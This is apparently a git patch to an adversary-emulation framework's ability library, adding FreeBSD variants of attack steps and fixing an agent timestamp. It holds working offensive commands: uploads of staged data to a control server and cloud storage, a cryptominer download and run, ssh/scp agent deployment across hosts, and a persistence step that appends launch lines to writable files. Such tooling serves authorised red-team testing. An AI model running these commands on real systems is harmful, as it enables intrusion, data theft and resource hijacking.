2fc29c5b..1228ccca 100644 --- a/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml +++ b/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml @@ -8,7 +8,7 @@ attack_id: T1018 name: Remote System Discovery platforms: - linux: + freebsd,linux: sh: command: host "#{target.org.domain}" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev parsers: diff --git a/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml b/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml index 8239d2ad..7cfe40f5 100644 --- a/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml +++ b/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml @@ -12,7 +12,7 @@ sh: command: | sudo ifconfig - linux: + freebsd,linux: sh: command: | sudo ifconfig diff --git a/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml b/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml index 550c6051..5ea5b46e 100644 --- a/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml +++ b/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml @@ -12,6 +12,10 @@ sh: command: | pwpolicy getaccountpolicies + freebsd: + sh: + command: | + cat /etc/pam.d/passwd linux: sh: command: | @@ -19,4 +23,4 @@ windows: psh: command: | - net accounts \ No newline at end of file + net accounts diff --git a/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml b/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml index abcca65e..08828ecf 100644 --- a/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml +++ b/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml @@ -15,7 +15,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.current.time - linux: + freebsd,linux: sh: command: | date -u +"%Y-%m-%dT%H:%M:%SZ" diff --git a/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml b/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml index 371c6cb9..3a844d29 100644 --- a/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml +++ b/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml @@ -14,7 +14,7 @@ pkill -f sandcat payloads: - sandcat.go - linux: + freebsd,linux: sh: command: | nohup ./sandcat.go -server #{server} & diff --git a/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml b/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml index 25e15895..c3b00bbf 100644 --- a/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml +++ b/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml @@ -10,7 +10,7 @@ attack_id: T1567.001 name: Exfiltration to Code Repository platforms: - linux: + freebsd,linux: sh: command: | # Temporary file needed to avoid curl length restrictions GHUser="#{github.user.name}"; diff --git a/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml b/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml index a34ec370..9cdec7d8 100644 --- a/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml +++ b/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml @@ -6,7 +6,7 @@ attack_id: T1029 name: Scheduled Transfer platforms: - linux: + freebsd,linux: sh: command: | crontab -l > /tmp/origcron; @@ -46,4 +46,4 @@ Register-ScheduledTask -TaskName "Scheduled exfiltration" -Trigger $trigger -Action $action; cleanup: | - Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false; \ No newline at end of file + Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false; diff --git a/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml b/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml index cafa92d4..a7f340ea 100644 --- a/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml +++ b/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml @@ -6,7 +6,7 @@ attack_id: T1560.001 name: 'Archive Collected Data: Archive via Utility' platforms: - linux: + freebsd,linux: sh: command: | tar -czf #{host.dir.git}.tar.gz -C "#{host.dir.git}" .; printf #{host.dir.git}.tar.gz; diff --git a/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml b/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml index 71c77fe4..09f41036 100644 --- a/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml +++ b/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml @@ -17,7 +17,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.dir.compress - linux: + freebsd,linux: sh: command: | tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz @@ -38,4 +38,4 @@ - source: host.dir.compress requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.staged \ No newline at end of file + - source: host.dir.staged diff --git a/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml b/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml index 6cd51ee9..737bb25f 100644 --- a/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml +++ b/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml @@ -43,7 +43,7 @@ $result = $sr.ReadToEnd(); $result; $res.close(); - linux: + freebsd,linux: sh: command: | LocalFile='#{host.dir.compress}'; @@ -55,4 +55,4 @@ --data-binary @#{host.dir.compress} requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.compress \ No newline at end of file + - source: host.dir.compress diff --git a/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml b/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml index 7a950493..eb782c3a 100644 --- a/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml +++ b/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml @@ -6,7 +6,7 @@ attack_id: T1567.001 name: Exfiltration to Code Repository platforms: - linux: # https://docs.github.com/en/rest/reference/repos#contents + freebsd,linux: # https://docs.github.com/en/rest/reference/repos#contents sh: command: | GHUser="#{github.user.name}"; diff --git a/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml b/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml index f292c1ac..1cd2dcf8 100644 --- a/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml +++ b/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml @@ -11,7 +11,7 @@ attack_id: T1030 name: Data Transfer Size Limits platforms: - linux: + freebsd,linux: sh: command: | tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg; diff --git a/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml b/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml index ce41f732..30c3d06d 100644 --- a/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml +++ b/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml @@ -7,7 +7,7 @@ attack_id: T1567.001 name: Exfiltration to Code Repository platforms: - linux: + freebsd,linux: sh: command: | GHUser="#{github.user.name}"; @@ -62,4 +62,4 @@ }; requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.staged \ No newline at end of file + - source: host.dir.staged diff --git a/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml b/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml index 193539c9..030a0931 100644 --- a/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml +++ b/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml @@ -9,7 +9,7 @@ attack_id: T1537 name: 'Transfer Data to Cloud Account' platforms: - linux: + freebsd,linux: sh: command: | LocalFile='#{host.dir.compress}'; diff --git a/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml b/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml index a294634c..d88272bd 100644 --- a/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml +++ b/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml @@ -8,7 +8,7 @@ attack_id: T1048.003 name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol platforms: - linux: + freebsd,linux: sh: command: | LocalFile='#{host.dir.compress}'; @@ -35,4 +35,4 @@ $requestStream.Dispose(); requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.compress \ No newline at end of file + - source: host.dir.compress diff --git a/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml b/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml index c2be2101..cf862323 100644 --- a/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml +++ b/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml @@ -8,7 +8,7 @@ attack_id: T1567.002 name: 'Exfiltration to Cloud Storage' platforms: - linux: + freebsd,linux: sh: command: | LocalFile='#{host.dir.compress}'; @@ -30,4 +30,4 @@ aws s3 rm s3://#{s3.source.name}/$RemoteName; requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.compress \ No newline at end of file + - source: host.dir.compress diff --git a/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml b/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml index 7556131c..23bf3981 100644 --- a/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml +++ b/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml @@ -12,7 +12,7 @@ sh: command: | curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload - linux: + freebsd,linux: sh: command: | curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload diff --git a/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml b/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml index a18739cf..a69a9ea0 100644 --- a/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml +++ b/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml @@ -19,6 +19,19 @@ cleanup: | rm -rf ./xmrig*; timeout: 120 + freebsd: + sh: + # FreeBSD should include `timeout` making this easy. + # We expect timeout to return a 124, which needs to then return a 0 + # to make Caldera UI happy. + command: | + wget https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz; + tar -xf xmrig-6.19.2-freebsd-static-x64.tar.gz; + timeout 60 ./xmrig-6.19.2/xmrig; + [ $? -eq 124 ] + cleanup: | + rm -rf ./xmrig*; + timeout: 120 darwin: sh: # MacOS does not include timeout, but can mimic the process with screen. diff --git a/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml b/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml index 722ff8bc..c5dd3a75 100644 --- a/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml +++ b/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml @@ -12,7 +12,7 @@ sh: command: | echo "proof that this machine was hacked." > message.txt - linux: + freebsd,linux: sh: command: | echo "proof that this machine was hacked." > message.txt diff --git a/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml b/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml index 0421f020..566c3df7 100644 --- a/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml +++ b/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml @@ -7,7 +7,7 @@ command: ./mission.go -duration 60 -extension .caldera -dir '/' payloads: - mission.go - linux: + freebsd,linux: sh: command: ./mission.go -duration 60 -extension .caldera -dir '/' payloads: diff --git a/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml b/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml index 073039cc..57d0f31c 100644 --- a/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml +++ b/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml @@ -15,6 +15,15 @@ ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go' payloads: - sandcat.go-darwin + freebsd: + sh: + command: | + scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go && + ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &' + cleanup: | + ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go' + payloads: + - sandcat.go-freebsd linux: sh: command: | diff --git a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml index dc3b340c..0c8c4875 100644 --- a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml +++ b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml @@ -46,6 +46,14 @@ ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f sandcat.go' payloads: - sandcat.go-darwin + freebsd: + sh: + command: | + scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go + cleanup: | + ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go' + payloads: + - sandcat.go-freebsd linux: sh: command: | diff --git a/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml b/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml index a652b190..8c1817b4 100644 --- a/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml +++ b/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml @@ -12,6 +12,12 @@ find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-darwin && sandcat.go-darwin" >> "{}"; ls "{}" ' \; | echo "complete" payloads: - sandcat.go + freebsd: + sh: + command: | + find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-freebsd && sandcat.go-freebsd" >> "{}"; ls "{}" ' \; | echo "complete" + payloads: + - sandcat.go linux: sh: command: | From 94fd44615085fadb9851362a51034595d99f62b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alonso=20C=C3=A1rdenas?= Date: Fri, 12 May 2023 22:45:39 -0500 Subject: [PATCH 2/2] Fix time data does not match issues ValueError: time data '2023-05-12 22:43:46' does not match format '%Y-%m-%dT%H:%M:%SZ' --- payloads/ragdoll.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/ragdoll.py b/payloads/ragdoll.py index 54ebfac0..e1c8e4ad 100644 --- a/payloads/ragdoll.py +++ b/payloads/ragdoll.py @@ -63,7 +63,7 @@ def _send_beacon(self): def _execute_instruction(self, i): print('[+] Running instruction: %s' % i['id']) cmd = self._decode_bytes(i['command']) - execution_timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + execution_timestamp = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ') try: output = subprocess.check_output(cmd, shell=True, timeout=i['timeout']) except subprocess.CalledProcessError as e: